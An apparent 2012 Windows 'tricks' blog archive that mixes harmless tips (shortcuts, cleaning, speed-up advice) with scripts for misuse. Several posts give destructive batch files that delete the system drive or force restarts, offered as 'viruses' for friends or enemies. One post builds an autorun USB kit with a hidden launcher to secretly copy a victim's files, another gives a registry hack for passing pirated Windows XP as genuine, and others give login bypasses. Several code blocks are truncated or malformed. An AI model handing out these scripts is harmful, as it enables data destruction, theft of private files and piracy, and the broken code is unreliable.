Friday, 15 June 2012

Trick to Hide the Data in Notepad

Now we can hide all of our Private Data in the Notepad as there is an interesting Trick to Hide the Data in Notepad. Here is a simple Trick to Hide text inside Windows Notepad using Command Prompt.

Note : This Trick only works on NTFS File System.
To use this simple Trick follow these simple steps :
1) Now click Start  >>  Run  >>  cmd to Open Command Prompt.
2) Type cd desktop to move File to the desktop.
3) Type "notepad filename.txt:hidden" ( without quotes  ) in Command Prompt.
4) Write Some Private or any Data to be Hidden and Save the file.
5) Browse to the File Location and Open filename.txt. Now we cannot see any data in the File.
6) To retrieve the Hidden Data, Open Command Prompt again and type the Same command  "Notepad filename.txt:hidden" ( without quotes ).
7) Now the Hidden data has been retrieved.
So it is a simple Trick to Hide the Data in Notepad.

Thursday, 14 June 2012

Trick to Hack Facebook Chat History

There is a simpe easy Trick to Hack Facebook Chat History. We can Hack Chat History even if our Friends are Offline. To use this Trick follow the simple steps given below :
1) Open Friends profile.
2) Right Click on the Poke and Select Copy Link Location. Now we have the ID in our Clipboard.
3) This will exactly look like :
( where XYX can be any numbers and this XYZ is nothing but the ID ).
4) Now in the Address Bar type "javascript:Chat.openTab(XYZ)" (without qoutes) and press Enter.
5) Now it is done.
6) You can see full Chat History now.
So this is a simple Trick to Hack Facebook Chat History

Trick to make a Virus which can Format and Destroy Hard Drive

There is a Trick to make a Virus which can Format and Destroy Hard Drive using Notepad. This Virus can be used to annoy your friends or enemy. Touse this Trick follow the simple steps given below :
1) Open Notepad.
2) Copy and Paste the given Code into Notepad :


3) Save it as HardDriveVirus.exe.
4) Now it is done.
5) Don't Run this Fle on your Own Computer. If you run this file the Hard Drive would be Formated.
So it is a simple Trick to make a Virus which can Format and Destroy Hard Drive

Tricks to make Simple Virus

There are many Virus which we an develop or can make easily. As I already posted earlier about many Tricks to make Virus, Now here are some more Tricks to make Simple Virus. To make them use the following Trick :
1) Open Notepad
2) Copy and Paste the given below Code of your Choice i.e. type of Virus you want to make :

a) To Delete all the Content of a Drive use this Code :
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
b) To Crush the Windows use this Code :
@Echo off
Del C:\ *.* y
c) To make Computer Restart simultaneously use this Code :
@echo off shutdown -r -f -t 00
d) To make Fork Virus to open many Command Prompts use this Code :
goto :s
3) Now Save these Files with any desired name with .bat extention.
4) Don't Run these Files on Your own Computer otherwise the Result you already know.
So these are simple Tricks to make Simple Virus.

Wednesday, 13 June 2012

Tricks to Create a New Folder using Keyboard Shortcut Tricks to Create a New Folder using Keyboard Shortcut

We all know how tocreate a New Folder on our Hard Drives. Do you ? Well to reate a New Folder we mostly follow this way i.e Right click  >>  New  >>  Folder. But it seems to be an Old fashion and also time consuming step.
Now here are two methods or Tricks which can be followed to make a New Folder.
1) Go to the Directory or Drive where a New Folder is to be created.
Then just press Alt + F then after it press W + F. Now it is done. New Folder is being created.
Now if this Method or Trick is also seeming you to be time consuming then you may use this second Trick i.e.
2) Go to the Directory or Drive where a New Folder is to be created. Then just press Ctrl + Shift + N and it is done. A New Folder has been created.
So these are simple Tricks to Create a New Folder using Keyboard Shortcut.

Trick to LogIn to any Version of Windows without Password

There is a Trick to LogIn Windows even if we have forgotten our Account's Password. Mostly people reinstalls the Windows again and lose all their Documents or Data saved in the Windows Drive. But now we have a simple Trick by which we need not worry to lose our Data and Install the Windows again.

For this Trick we just need is your Windows Installer Disc and the Locked Computer to having an Optical Drive i.e CD Drive. This is very handy Trick if  we ever forgot our Password and don't have access to our Computer.
To use this Trick follow these simple steps :
1) Put the Windows Installer Disc into the CD / DVD Drive and Press any key when prompted to Boot from CD.
2) After all Process when it asks for License Agreement jusr press F8 to Agree.
3) On the Next Screen when Prompted to Repair or Install a Fresh Copy of Windows, just select the Earlier Installed Windows Installation and press R to Repair it.
4) The system will then Reboot after Setup Checking and Copying Setup Files. When it Reboots, don't press any key when Prompted to Press any key to Boot from CD. The setup will be Automatically Start the Setup Process.
5) Now this is the most Important Step. Wait for the setup to Install the Devices and when this Setup starts press Shift Key + F10.
6) After that a Command console would Open. Now type "NUSRMGR.CPL" ( without quotes ) and press Enter.
7) Now this will give Access to the User Account Window similar to the Control Panel where we can Delete or Edit the Forgotten Password. Now choose Remove to LogIn the Computer without Entering Password or Edit to Change the Password.
8) After Deleting or Edit Password, close the Command Window and let the Setup to Finish.
9) When Setup Finishes, Computer will Restart and Windows will Start Normally. If You earlier selected to Edit Password, then it will Prompt to Enter Password so Enter it and LogIn.
10) Now it is done. We have now Login to Locked Windows Computer.
So it is a simple Trick to LogIn to any Version of Windows without Password.

Trick to Hack any version Windows

There is a simple Trick to Hack any version Windows even if we don't know the Windows Password. We just need not worry to apply any manual effort for this as the Trick is based on the Free Rescue Software for Windows. We just need this Software and have to Run at Startup by Booting it. By this Software we can Perform many Administrator Task even if we don't know the Administrator Password.
This Software is Trinity Rescue Kit.
We can do following things using this Software :
1) Easily Reset Windows Passwords.
2) Perform a Virus Scan by the Products Integrated in a Single Uniform Commandline.
3) Full NTFS Write.
4) Winclean to Clean Up all sorts of unnecessary Temporary Files on Computer.
5) BackUp the Data using BackUp Utility.
6) Run Utility like Windows Filesharing by Samba Fileserver.
7) Run a SSH Server.
8) Recovery and Undelete Files.
9) Recovery Lost Partitions.
10) Evacuate Dying Disks.
11) Use Rootkit Detection Utilities.

To Download this Software visit here.

Here is the procedure to follow for this Trick :
1) Download Trinity Rescue Kit.
2) Extract the Files onto the Computer in Specific Folder.
3) Now we have to do the main Job. If you want to make a Rescue CD / DVD then Burn all the Extracted Files to
CD / DVD or if you want to make a Rescue USB or Pen Drive then Copy and Paste the Extracted Files to USB or
Pen Drive.
4) Now it is done. Whenever you forgot your Password and need to Hack the Windows i.e.wants to perform
Administrator Task, then use the Rescue CD / DVD or USB / PEn Drive, so created by you.
So it is a simple Trick to Hack any version Windows.

Tuesday, 12 June 2012

Top 10 Tricks and Tips to Protect Data and Security

Many of us wonder to Protect our Data in Safe and wants to increase it's Secure it's Up to many Folds. Many of  us think that it's enough that we keep our System i.e Windows and Antivirus upto Date. But this is not upto the mark. As Windows Update and Antivirus Software alone cannot Protect Data and it's Security. So here are Top 10 Tricks and Tips to Protect Data and Security.

1) Disable Remote Registry Editing : Only we should be able to edit our Windows Registry, so make sure this service is Disabled by Clicking Start  >>  Run  >>  services.msc  >>  Remote Registry and make sure that this Service is stopped or if not then do it and then set it to either Manual or Disable.
2) Lock the Computer : It's always a good idea to Lock the Computer if Strangers are nearby and we are going to step away for a some time. THis can be done by just pressing Windows Key + L. Alternatively we can set the ScreenSaver and set it to require a Password if it is Deactivated by Checking the box in Settings that says On resume, password protect.
3) Prevent Phishing Attacks : Protect yourself from Identity Theft and Phishing Attacks by using the the latest versions of Firefox, Internet Explorer, Opera etc . These Browsers Include Protection that Double Checks URLs against a Blacklist and will notify when we are about to visit a known Phishing Site.
4) Be Wary of P2P Files : Virus makers love peer to peer File Sharing Services. They name their Virus on the name of Famous People and Upload it. Then millions of People Download it, launch it and wonder why their Computers are infected with Viruses. Download these with caution and always use a good Antivirus Software.
5) Wipe the Drive Before Donating Old Computer : If someone is getting rid of a Hard Drive and wants to cahnge it then he /she should wipe out all the Data to an Unrecoverable state.
6) Encrypt Sensitive Files : We should always Encrypt the Sensitive Data of our Computer and save it to a safe place.
7) Must Back Up the Data and Verify it : We must Back Up our Data under a specific Period of time. Many people Set and Forget about the Data Back Up. But we should keep it in our Mind  to Back Up Regularly. After Back Up we should Check the Target Folders Periodically to Ensure the Proper Files are being Backed Up or not. If not then Reconfigure the Backup Routine to make sure it's Working Properly.
8) Turn OFF Computer during Lightning Storms : Even Surge Protectors can be Overwhelmed during Electrical Storms and we already know the Results that could take place so during Heavy Duty Electrical Storm we should Unplug Computer from the Wall Socket.
9) Enable SMART Tecnique for Hard Drives : SMART is Abbrevation of Self Monitoring Analysis and Reporting Technology which allows our Drive to Report when it is about to Fail which can give us a Heads Up to Replace it.
10) Enable Extension Viewing : By default Windows Hides File Extensions and Virus Makers Exploit this Feature by giving their Executable Program names ending with .exe extention which appears to be an Application. To
Enable Extension Viewing Open Folder Options and Uncheck Hide Extensions for known File Types.
So these are Top 10 Tricks and Tips to Protect Data and Security

Trick to Turn OFF System Beeps

Normally Windows Warning Beeps are very useful to identify when Problem Happen and also in determining it. One internal speaker in our Computer casing creates these Beeps. But for some people it seems to be Disturbing or Sometime when we are working with our Computers or Laptop in the Library or other Quiet Areas then these Beeps seems to be Disturbing. Now here is Trick to Turn OFF all the Computer's Beeps. Todothis this follow the simple steps given below :

1) Click Start  >>  Run  >>  Regedit  >> HKEY_CURRENT_USER\Control Panel\Sound.
2) Double Click on Beep in Right Side Panel and Change its Value to NO.
3) Now Close the Registry Editor and Restart Computer.
4) Now it is done.
If you want to reverse this Change then simply give it value Yes again.
So it is a simple Trick to Turn OFF System Beeps.

Trick to Clean CD Drive

If the CD Drive is Creating Problems to read CD Disc or taking much Time to Read and finally Showing message
No Disc in the Drive then these are the Symptoms of Dirty or Weak CD Drive Lens as Dirty Lens can Create
Errors in Reading or Writing and can soon become Dead. Now here is the Trick to Clean CD Drive :

1) First make sure that Discs are Clean, Unscratched and is Loaded Properly.
2) Always use Laser Lens Cleaner to Clean Drive Lens.
3) Insert the Laser Lens Cleaner Disc and Play it for 2 to 3 minutes.
4) Using CD Drive Cleaner properly can efficiently Clean the CD Drive Laser from the Dust. But if the Problem is
not solved till these steps then Open it and Clean the Lens with a Cotton Swab.
Soit is a simple Trick to Clean CD Drive.

Monday, 11 June 2012

Trick to ShutDown Computer 100 Times Faster

We many suffer from the Lack of time many of sometimes and many when we are on our Computer and we urgently have to go somewhere else. Now what we just want now ? We would be just wondering that how much time our Computer would take to ShutDown ! Now what if our Computer takes time to ShutDown ?
We are left with none other Option then Leaving it ideal or Switching it OFF directly. But as we know that if Computer does not ShutsDown Properly then it may cause errors and may some time be Dangerous for it's Health. Now There is a Solution for this i.e. Trick to ShutDown Computer 100 Times Faster. Yes Here is that Trick. To use it just follow the simple steps :
1) Press Ctrl + Alt + Del to Open Task Manager.
2) Click the ShutDown Tab from the Start Menu while holding Ctrl Key and select Turn OFF.
3) Now it is done.
So it is a simple Trick to ShutDown Computer 100 Times Faster.

Top 10 Tricks and Tips to Improve Computer Speed

There are many Triks and Tips to Improve Computer Speed. . It doesn’t matter if the RAM 256 MB or 2 GB. The Speed depends on many fators like Memory Junk etc. Here are the Top 10 Reommended Tricks and Tips to Improve Computer Speed :

1) We should let the Computer Boot Up Completely before Opening any Applications.
2) Refresh the Desktop after closing any Application. This will remove any unused files from the RAM.
3) Do not set very large file size Images as the Wallpaper and if the Computer is on very low RAM like 64 MB or 128 MB then avoid using it if possible.
4) Do not Clutter the Desktop with lot of Shortcuts as each Shortcut on the Desktop uses up to 500 bytes of RAM.
5) Empty the Recycle Bin Regularly. As we know that the Files we delete are not really deleted from our Hard Drive until we Empty the Recycle Bin.
6) Delete the Temporary Internet Files Regularly.
7) Defragment the Hard Drive once every Month. This will free Up a lot of Space on our Hard Drive and would rearrange the Files so that our Applications Run Faster.
8) Always make two or more Partitions in the Hard Drive and Install all Large Softwares ( like PSP, Photoshop, 3DS Max etc ) in the second partition as Windows uses all the available Empty Space of C Drive as Virtual Memory when our Computer RAM is full. I Recommend to keep the C Drive as Empty as possible.
9) When Installing a New Softwares Disable the Option of having a Tray icon. The Tray Icons use up the maximum available RAM and also Slow Down the Booting Time of our Computer. Also Disable the option of Starting of the Application Automatically on the Computer Start.
10) Protect the Computer from Dust. Dust causes the CPU Cooling Fan to Jam and Slow Down it's Speed thereby gradually heating CPU and affecting the Processing Speed i.e. Computer's Speed. Use compressed air to blow out any Dust from the CPU. Never use vacuum.
So these are simple Top 10 Tricks and Tips to Improve Computer Speed.

Trick to Lock Computer using Mouse

There is a simple Trick to Lock Computer using Mouse. We generally use Ctrl + Alt + Del or Windows Key + L to
Lock our Computer. Instead of trying these Keyboard Shortcuts, let us know how to Lock Computer with Mouse.
Here is the Trick to Lock Computer using Mouse.
1) Right Click on the Desktop  >>  New  >>  Shortcut.
2) Now Rename this Shortcut by typing “rundll32 user32.dll,LockWorkStation” ( without quotes).
3) Click Next.
4) In "Type a name for this shortcut” option, type Lock Computer.
5) Click Finish.
6) Now it is done. Shortcut is Ready to Lock the Computer.
So it is a simple Trick to Lock Computer using Mouse.

Sunday, 10 June 2012

Trick to make Windows XP 100% Genuine

Every person who has used Computer has been familiar with the Windows XP. Windows XP is the most liked Operating System by people all over the Globe.

It is very simple and have many nice features than any other Operating System.

Due to these features many people buys the original Windows XP.

As Original Windows is just better than the pirated one like Online Windows Update, Genuine Microsoft Softwares or similar more can be only used on Genuine Windows.

But all people cannot afford it or don't want to spend even a penny on it. So this Trick is for those who want to make their Windows XP Genuine without spending a penny on it.
Please note that you are not going to Misuse this Trick.

So to use this Trick just follow these simple Steps :

1) Open NotePad.
2) Copy and Paste the following Code into Notepad :

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion]
“CurrentBuild”=”1.511.1 () (Obsolete data – do not use)”
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWPAEvents]

3) Now Save this file as WindowsXPGenuine.reg.

4) Run this file and Restart the Computer.

5) Now it is done.
Now your Windows XP is no more Pirated i.e it is now Genuine. If you want to check whether it is Genuine or not then visit the Microsoft Site and Check here.

Trick to Delete Empty Folders in Windows Automatically

We all use Computers or Laptops and we all are Happy in Installing and Uninstalling the New softwares and Programs on our Windows. But have you ever thought that Installing of any Software or Program create many Directories and Folders for it's working ? It's obvious everybody knows this thing ! But do you know when we Uninstall that Software or Program, many of the Folders or Directories are not Removed from our Computer Hard Drive and these act as the residual waste on our Computer which is of no use.
These Folders even after being Empty, occupy some space on our Hard Drive and if we frequently Installor Uninstall the softwares or Programs then the size of these Folders could be very large which can even Slow Down the already Slow Running Computer. So here is the simple Trick to Remove these Empty Folders and Directories.

To use this Trick just Download the Software, Remove Empty Directories from here.

Now after Downloading, Install the RED ( Remove Empty Directories ) on your Computer and choose the Specific Drive from Browse Option to Scan for Empty Folders & Directories and then just select the Option Delete Folders from the Menu located below. If you have any Problem in using this software then you can Comment here or Contact Us anytime.
Note : After Deleting the Folders do not forget to Empty Recycle Bin, as all the Deleted Folders would be sent to Reycle Bin.
So this is the simple Trick to Delete Empty Folders in Windows Automatically.

Trick to Increase USB or Pen Drive Speed

There is Trick to Increase USB or Pen Drive Speed by more than Two Times. This Trick can improve the USB or Pen Drive performance and moreover Speed Up the Computer to some Extent. To use this Trick just follow the simple Steps :
1) Connect the USB or Pen Drive to Computer.
2) Open My Computer  >>  Right Click USB or Pen Drive  >>  Properties.

3) Then on the Hardware Tab select the USB or Pen Drive connected and then click Properties  >>  Policies Tab.
4) Now select "Optimize for Performance" Option rather than "Optimize for Quick Removal" and click Ok.
5) Now just Format the USB or Pen Drive with NTFS File System by Selecting Format Option from the Drop Down Menu of Formatting.
6) Now it is done.

Saturday, 9 June 2012

Trick to Repair Windows XP without Installation CD

It is very annoying when our Computer is running on the Operating System whose files are corrupted and many times shows an Error message and make us Frustated and leaving us with none other option than Reinstalling the Windows. But this is not the solution we an also Repair it. But what if do not have the Installation CD.
No problem Top Tricks and Tips is always there.

Here is a simple Trick to Repair Windows XP without Installation CD. To make use of this Trick just follow these steps :
1) Click on Start  >>  Run  >>  Type "webfldrs.msi" ( without quotes ).
2) Now follow the Instructions.and select Reinstall Mode.
3) Now Check all the options on the New Screen which appears and click OK.
4) Now after it Restart the Computer and it is done.
So it is a simple Trick to Repair Windows XP without Installation CD.

Trick to Secretly Copy and Steal Data from Computer to a USB or Pendrive

We are often curious to know about the Data and Files which is in others Computer but we are not allowed to do so due to restrictions by the Computer owner or of some other Reason.

But here is a Trick which can help us to Copy and Steal all the Secret Data or Files from the Victims Computer by just plugging the USB or Pendrive to the Computer.

This Trick could prove to be very helpfull and it would Copy and Steal all the Data without the Confirmation and Knowing of Computer Owner.

To use this Trick just follow these simple Steps :

1) Open Notepad.

2) Copy and Paste the following Code into Notepad :

action=Click OK to Run

3) Save this file as autorun.inf.

4) Open Notepad again.

5) Copy and Paste the following Code :

@echo off
:: variables
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\Data\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\Data\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\Data\vids"
@echo off

6) Save this file as File.bat.

7) Open Notepad again.

8) Copy and Paste the following Code :

Run """" & WScript.Arguments(0) & """", 0, False

9) Save this file as Invisible.vbs.

10) Now again open Notepad.

11) Now Copy and Paste the following Code :

wscript.exe \invisible.vbs file.bat

12) Save this as Launch.bat.

13) Now Copy and Paste all the four (4) files created in the above steps to the USB or Pendrive.

14) Create a folder named “Data” where the Stolen contents would be Copied automatically.

15) Now it is done. The USB or Pendrive is ready to Steal the Secret Data or Files.

So it is simple Trick to Secretly Copy and Steal Data from Computer to a USB or Pendrive.

Trick to Bypass the Firewall

Well we all are familiar with the Firewall and know what is it about. It sometimes create problems for us some or other way. Like if we are in School, Colleges or Office and the use of some sites like Orkut, Facebook etc is either not allowed or blocked by Firewall.
Now here is Trick to Bypass the Firewall.
This can be easily done by using a simple and small Software i.e UltraSurf. It will not only allow us to surf Blocked Websites but will also give us Freedom to Download / Upload Softwares and Stream Videos. To use this Trick just Download the UltraSurf and Install it on the Firewalled Computer.

To Download UltraSurf Visit here.

Remember to Download the Setup of this Software on the Computer and Save it on the PenDrive / USB and install it on Computer where the Firewall is to be Bypassed.

So it is a simple Trick to Bypass the Firewall.

Friday, 8 June 2012

Trick to make a Virus which Hit Enter Simultaneously

There is a Trick to make a Virus which Hit Enter Simultaneously. This Trick can be used to annoy the Friends or Enemy. To make this Virus follow the simple steps :
1) Open Notepad.
2) Copy and Paste the following Code into Notepad :

Set wshShell = wscript.CreateObject(“WScript.Shell”)
wscript.sleep 100
wshshell.sendkeys “~(enter)”

3) Save it as EnterSimultaneous.vbs.
4) Now it is done.
So it is a simple Trick to make a Virus which Hit Enter Simultaneously.

Trick to make Poison Virus

There is Trick to make a Poison Virus i.e Virus which would definetly lead to destruction in computer.
This trick can be used to annoy Friends or Enemy.

This Virus would ask to choose a number
between 1 - 5 and then do a certain action :

1) Shutdown
2) Restart
3) Wipes out your hard drive (BEWARE).
4) Net send
5) Messages then shutdown

To make this simple virus follow these simple steps :

1) Open Notepad.

2) Copy and Paste the following Code into Notepad :

@echo off
title The end of the world
cd C:\
I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc…
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 4. Die this way (you’re boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

3) Save it as PoisonVirus.bat.

4) Now it is done.

So it is a simple Trick to make Poison Virus.

Trick to Disable Windows logo Key.

There is a Trick to Disable Windows logo Key. It is very annoying for many people the Windows Logo Key. So now we can Disable it via simple Trick.
Here is a simple Trick to Disable Windows logo Key.1) Open Notepad.
2) Copy and Paste the following Code into Notepad :

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]
“Scancode Map”=hex:00,00,00,00,00,00,00,00,03,00,00,00,00,00,5b,e0,00,00,5c,e0,\

3) Save it as WindowsLogoKey.reg.
4) Run it and Restart the Computer.
5) Now it is done.
So it is a simple Trick to Disable Windows logo Key.

Thursday, 7 June 2012

Trick to make PowerFull Worm Virus.

Worms are Programs that Replicate themselves from System to System without the use of a Host File. Worms generally Exist inside the other Files like Word or Excel Documents. This Trick can be used to annoy Friends or Enemy.
Note : Run this file at your own Risk. I am not Responsible for any Accident caused by this File on your Computer.Here is Trick to make PowerFull Worm Virus.

1) Open Notepad and type "Start Virus Virus.bat".
2) Save it as and Virus.bat.
3) Now create shortcut to this File so it looks more Serious.
4) Now go to Properties and Change Icon.
5) Now Rename it and Send it to anyone.
6) Now it is done.
So it is simple Trick to make PowerFull Worm Virus.

Tips to Clean the Motherboard

Dust Particles and other small dirty Particles can build up and Corrode circuitry causes various problems such as Computer Overheating and Computer Lockups. As we all know that Motherboard is also an Important Part of the Computer so we should keep in mind the good of health of the Motherboard. So we should Clean the Motherboard atleast once in 3 months or
early if the Computer is kept at the place where Dust Particles are more and can invade inside the CPU easily.

Note : We Recommend that you should be enough confident that you can Clean the Motherboard on your own easily. When inside the CPU you must take the necessary precautions and try to avoid Unplugging any cables or other Connections. When cleaning the inside of the case also look at any Fans or Heat Sinks as Dust, Dirt or Hair Particles collects around these Components the most.

The best practice to Clean Motherboard from Dust, Dirt or Hair Particles is to use Compressed Air. When using Compressed Air, hold it in the Up Right position; otherwise, it is possible chemicals may come out of the container that could damage or corrode the Motherboard or other component within the Computer. Also, ensure when using Compressed Air that you always blow the dust or dirt away from the Motherboard or out of the case.

Another Good alternative to Compressed Air is to use a Portable Battery powered Vacuum Cleaver that can effectively remove the Dust, Dirt or Hair from the Motherboard Completely and Prevent it from getting Trapped within the Case. However, do not use a Standard Electricity Powered Vacuum Cleaner as it can cause a lot of static electricity that can Damage the Computer. When using the Vacuum Cleaner it is important that you keep it's nozzle a couple inches away from the Motherboard and all other components to help prevent any part or soldered joints from being Sucked by the Vacuum. Ensure that you do not remove even a small component with the Vacuum Cleaner.

So these are simple Tips to Clean the Motherboard

Tricks and Tips to Fix Slow Running Computer

Well, we neither all are having a Super Computer nor we all can efford it. This issue is not a big issue as not only the Super Computers can Run Fast but also the normal Computers can Run at an Optimum Speed. There are many ways to Speed Up computers and Improve their Performance. Here are some Top Tricks and Tips to Fix Slow Running Computer.
To use these Top Tricks and Tips follow the simple steps :

1) Clean the Computer Registry. Slow Computers often have Errors in their Registry. The registry is Similar to the Nervous System of the Computer and its function is to Connect Software, Hardware and Computer Files to each other. Over the period of time, Performance of any Computer Reduces as Errors accumulate in the Registry, which can also become Corrupted. A straight forward step is to locate any Errors in the Registry and Repair them. Cleaning the registry manually is possible but not Recommended, as this method requires specific knowledge of the Registry Structure and its Functions. Using a Registry Cleaner Software is a Faster, more reliable option to eliminate errors, redundant files, incorrect links and deal with ActiveX components.

2) Delete and Block Adware and Spyware. Another common reason leading the Computers to Slowing Down is the large number of Spyware and Adware which are downloaded from the Internet often without the Users knowledge. This happens particularly when Peer to Peer ( P2P ) Networks are being used to Download Files etc. An easy solution is to improve the response time of any Computer is to run an AntiSpyware or Adware program which will scan, remove and then block Adware and Spyware.

3) Eliminate Viruses. Unsurprisingly many Computer Viruses can Slow Down Computers and drive Down response time. Often Viruses Damage Computer files and use excessive resources such as large amount of RAM and Disk Space. By running the latest version of the best Anti Virus Programs we can overcome these problems and keep our Computer in a better position and can improve it's Performance.

4) Simple Housekeeping Tasks. As there may be many Softwares and Programs that would be worth nothing for us i.e they are of no use. So the best idea is to Uninstall any Software that is not needed. Another Simple step to Improve Computer Speed is to Stop Programs launching Automatically. These simple tasks generally produce marginal improvements.

5) Optimize the Hard Disk. For hard disks which are Smaller in size like 40 GB or less or are suffering from Low Disk Space then at least 500MB of disk should be kept free as the Computer Speed also depend on the Free Space on the Hard Disk. This can even be done by Performing a Handy Task of removing Temporary Files that are stored on our Hard Drive. As the Free Disk Space is also used for Swapping Files when the Operating System needs to use Virtual Memory when it runs out of RAM. The system can Slow Down Significantly at this stage if the space on the Hard Disk is insufficient. Disk Scanning Programs such as Scandisk for Windows can help check for errors on the Hard Disk. Running a Disk Defragmentar is another useful step which will improve Computer Performance and Speed.

6) Optimizing the RAM. Some Programs are Poorly designed that they do not Release RAM Resources even after they are closed. This means that other programs would be suffering from Less Memory to Run. Running out of RAM is too fast and is not uncommon. Users who have this problem should consider upgrading the Memory on their Computer. An alternative option is not to use certain Programs Simultaneously.

7) Stop the Computer from OverHeating. Faulty Fans are a common cause leading to the Computer Overheating, Slowing Down and then finally resulting in Freezing of a Computer. To overcome this problem, we should operate our Computer somewhere at cool place as cool as possible. This does not mean to work inside a Freezer ! It's just an advice to operate at cool place from the surrounding. The other Best solution is to Install a New Fan in CPU which will Reduce the Computer’s Temperature by Increasing the Airflow and Ultimately Improve Response Time.

So these are some Tricks and Tips to Fix Slow Running Computer.

Wednesday, 6 June 2012

How to find the Serial Number of Computer ?

Serial Number is a Unique Number that every genuine Computer have.

We need it whenever there is any Technical problem with our Computer and we want to register the Complaint to the Support Team.

So for Contact purpose we need Serial Number toLog the Request.

So it is very easy.
As we can get it from the Back side of Computer. But it is very disturbing to always slide the Computer Table and look back. So for this here is the Trick to check the Serial Number.

1) Open the Command Prompt and type "wmic bios get serialnumber" or "wmic csproduct get name, identifyingnumber"
( without quotes ).
This will print the Serial Number.

2) Other way can be going to System Tools, by going to Start  >>  All programs  >>  Accessories  >>  System Tools.

So this is the simple Trick on How to find the Serial Number of Computer.

Tuesday, 5 June 2012

How to make Google Sphere ?

There are many Google Tricks and some of these are very Interesting.

Many of these are known by Us and Many are just Unknown.

Now similarly there is a Trick to make a Sphere out of Google.
This page is also designed by MR Doob team.

In this Trick when you will Move your Mouse Cursor over the Page then the Google Webpage Items would turn into Sphere and will Start Rotating just like Our Animated Categories in the Right Sidebar.

So to use this Trick just Use this Link and Enjoy.

Note : This Trick works best on Google Chrome. But you can also try this on other Browsers and Share your experince here by Commenting Below.

How to Create Keyboard Shortcut for any Folder ?

Shortcuts are very handy and usefull for a Computer user.
All Computer users find Keyboard Shortcuts very usefull and time Saving.

These things are understood so we think this should not be explained in this Post.

So if Shortcuts are so important then what if we made a Shortcut for our Favourite folder which we always opens whenever we Logon to our Computer ?

So now here is the Trick for How to Create Keyboard Shortcut for any Folder.

To use this Trick just follow these simple Steps :

1) Open Windows Explorer and Navigate to the Folder for which you wants the Shortcut.

2) Now Right Click the Folder and Choose Send To  >>  Desktop ( Create Shortcut ).

3) Now Right Click that Shortcut located at the Computer Desktop and Choose Properties.

4) Now Click on the Shortcut Tab and Click in the Shortcut Key Field.

5) Now assign the Shortcut you want to Associate for your Folder and Click Ok.

6) Now it is done. 
Now whenever the desired Shortcut keys would be pressed then the Folder Associated with it will Open.

So it is a simple Trick on How to Create Keyboard Shortcut for any Folder.

How to Display Legal Notice on Windows Startup ?

We often work on the Computers which we share with some other users and we want them to restrict some rights or wants to give them a warning before they use the Computer. 

So now here is  the Trick which can be used to display a Legal Notice at every Startup just before the Computer's Desktop is loaded.

The Legal Notice can contain the Warning or any Notice you want to tell the other user of Computer when you are not there.

So to use this Trick just follow these simple steps :

1) Go to Start  >>  Run  >>  type regedit  >>  Press Enter.

2) Now navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system.

3) Now Look for “legalnoticecaption“ on the Right Side.

4) Double Click on it and Enter the Desired Legal Notice Caption.

5) Now somewhere below this look for “legalnoticetext” and Enter the Desired Legal Notice Text of your Choice.

6) Now Restart the Computer and it is done

Monday, 4 June 2012

How to send Styled Text In Facebook Chat

Facebook Tricks and Hacks are now very popular now a days.
And Facebook Users wants to explore more from the Facebook.
Most users wants to Hack Facebook Chat. And we have already discussed many of the Tricks and Tips of Facebook.

Now here is the Trick on How to send Styled Text In Facebook Chat. In this Trick Styled Text means that we can send Bold and Underlined Text through Chatting.
So here we go :

1) To Send Underlined Text.
Just type Underscore ( _ ) Before and After the Text to be Underlined.
For Example : When Chatting if we write  " _WORLD OF HACKING_ " ( without quotes ) then it would turn into WORLD OF HACKING

2) To Send Bold Text.
Just type Star or Asterisk ( * ) Before and After the Text to be Bolded.
For Example : When Chatting if we write  " *WORLD OF HACKING* " ( without quotes ) then it would turn into WORLD OF HACKING

3) Now if you want to Send an Underlined Bold Text then you can use both of the above two Tricks.
For Example : When Chatting if we write  " *_WORLD OF HACKING_* " ( without quotes ) then it would turn into WORLD OF HACKING.

So it is a simple Trick on How to send Styled Text In Facebook Chat.

Trick to make Facebook Upside Down

Making fun out of the Facebook is one of the most followed steps by the Facebook Users.
Every Facebook user wants to make his / her Profile look Unique and better then others.
So now here is one more Funny
Trick to make Facebook Upside Down.

This Trick would actually make all the Options to be written with the flipped text i.e. rotated upside down like this.

To use this Trick just follow these simple Steps :

1) Login to Facebook and navigate to Account Settings from Account Menu at Top right Corner.

2) Now go to “Language” Tab and Choose “English (Upside Down)” just before English (US).
3) Now it is done.
So it is a simple Trick to make Facebook Upside Down.

How to Fix Task Manager Disabled by Administrator in Windows

Task Manager is most used Application and we probably use it when we want to End any Unstable Application, Check Running Processes, Monitor CPU Performance, etc.
But many a times it may happen that our Computer might be Infected by some kind of Virus and the Task Manager is not running.

This can be even showing an error message like "Task Manager Disabled by Administrator".
So for this error, here is Trick on How to Fix Task Manager Disabled by Administrator in Windows.

Registry Trick

1) Click Start  >>  Run  >>  type "regedit" ( without quotes )  >>  press Enter to Open Registry Editor.

2) Now navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\System.

3) Here look for Registry Key named like "DisableTaskMgr" in the Right Pane. If you find this just simply Delete the key or Set its value to 0 by Double Clicking on it.

Group Policy Trick
If you not find any Registry Key named like "DisableTaskMgr" then alternatively use this Trick.

1) Click Start  >>  Run  >>  type gpedit.msc  >>  press Enter to open Group Policy.

2) Now Navigate to User Configuration  >>  Administrative Templates  >>  System  >>  Ctrl+Alt+Delete Option  >>  Remove Task Manager.

3) Now Right Click it  >>  Edit  >>  Select Not Configured  >>   Apply  >>  OK and Exit.

4) Now Restart the Computer and the Error must be Fixed.

Other Tricks
